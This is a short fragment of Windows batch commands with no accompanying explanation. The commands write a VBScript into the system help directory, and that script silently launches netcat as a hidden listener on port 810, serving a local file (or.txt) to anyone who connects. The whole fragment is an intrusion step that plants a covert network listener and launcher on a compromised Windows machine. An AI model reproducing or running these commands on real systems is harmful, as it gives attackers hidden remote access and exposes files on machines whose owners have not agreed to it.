echo dim wsh > %systemroot%/help/test.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%/help/test.vbs echo wsh.run "cmd /c %systemroot%/help/nc -v -l -p 810 < %systemroot%/help/or.txt",0 >> %systemroot%/help/test.vbs